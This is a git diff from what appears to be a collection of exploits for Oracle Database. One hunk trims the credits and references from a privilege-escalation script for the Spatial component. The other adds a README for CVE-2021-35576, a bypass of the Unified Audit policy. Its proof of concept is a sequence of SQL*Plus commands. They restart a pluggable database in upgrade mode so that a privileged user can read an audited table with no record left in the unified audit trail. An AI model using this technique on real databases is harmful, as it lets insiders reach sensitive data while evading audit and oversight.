diff --git a/27-Oracle/1-Oracle 数据库Spatial  组件提权/exp.sql b/27-Oracle/1-Oracle 数据库Spatial  组件提权/exp.sql
index ed3288f..9bffb84 100644
--- a/27-Oracle/1-Oracle 数据库Spatial  组件提权/exp.sql	
+++ b/27-Oracle/1-Oracle 数据库Spatial  组件提权/exp.sql	
@@ -156,13 +156,4 @@ configure auditing to catch any privilege escalation attempts.
 review database account permissions on regular basis.
 ensure database accounts have strong passwords, and rotate passwords regularly if possible.
 perform VA (vulnerability assesment) scans on regular basis.
-pro-actively patch your systems and database systems.
-
-
-*****************************************
-References:
-https://www.oracle.com/security-alerts/cpuoct2021.html
-https://databasesecurityninja.wordpress.com/2021/10/22/oracle-database-privilege-escalation-through-oracle-spatial-component/comment-page-1/
-
-Credit:
-Security-In-Depth Contributors: Emad Al-Mousa
+pro-actively patch your systems and database systems.
\ No newline at end of file
diff --git a/27-Oracle/2-Oracle Unified 审计策略绕过/README.md b/27-Oracle/2-Oracle Unified 审计策略绕过/README.md
new file mode 100644
index 0000000..2cf19ee
--- /dev/null
+++ b/27-Oracle/2-Oracle Unified 审计策略绕过/README.md	
@@ -0,0 +1,48 @@
+
+### CVE
+CVE-2021-35576
+
+### 受影响版本
+12.1.0.2, 12.2.0.1, 19c
+
+### POC
+
+```shell
+Proof of Concept (PoC):
+I will create a table in pluggable database PDB1 under HR schema and insert few records:
+SQL> CREATE TABLE HR.EMPLOYEE
+(
+  FIRST_NAME  VARCHAR2(50),
+  LAST_NAME   VARCHAR2(50)
+);
+SQL> INSERT INTO HR.EMPLOYEE (
+   FIRST_NAME, LAST_NAME)
+VALUES ( 'EMAD','MOUSA' );
+SQL> commit;
+
+
+SQL> INSERT INTO HR.EMPLOYEE (
+   FIRST_NAME, LAST_NAME)
+VALUES ( 'SAMI','MOUSA' );
+SQL> commit;
+I will now create audit policy:
+SQL> CREATE AUDIT POLICY SELECT_P1 actions select on HR.EMPLOYEE;
+SQL> audit policy SELECT_P1;
+To check audit policies configured in PDB1 database:
+SQL> SELECT * FROM audit_unified_enabled_policies;
+
+Now, let us simulate executing the select statement against the monitored/audited table while database is in upgrade mode:
+sqlplus / as sysdba
+SQL> alter session set container=PDB1;
+SQL> shutdown immediate;
+SQL> startup upgrade;
+SQL> select * from HR.EMPLOYEE;
+SQL> startup force;
+SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;
+
+
+Checking the audit logs using the query, NO entry is found recorded in the unified audit trail:
+
+SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME=’EMPLOYEE’ order by EVENT_TIMESTAMP desc;
+So, even though audit policy was configured in the database a DBA/System Admin can view the audited sensitive table without a trace as No record will be populated in UNIFIED_AUDIT_TRAIL view !
+```
\ No newline at end of file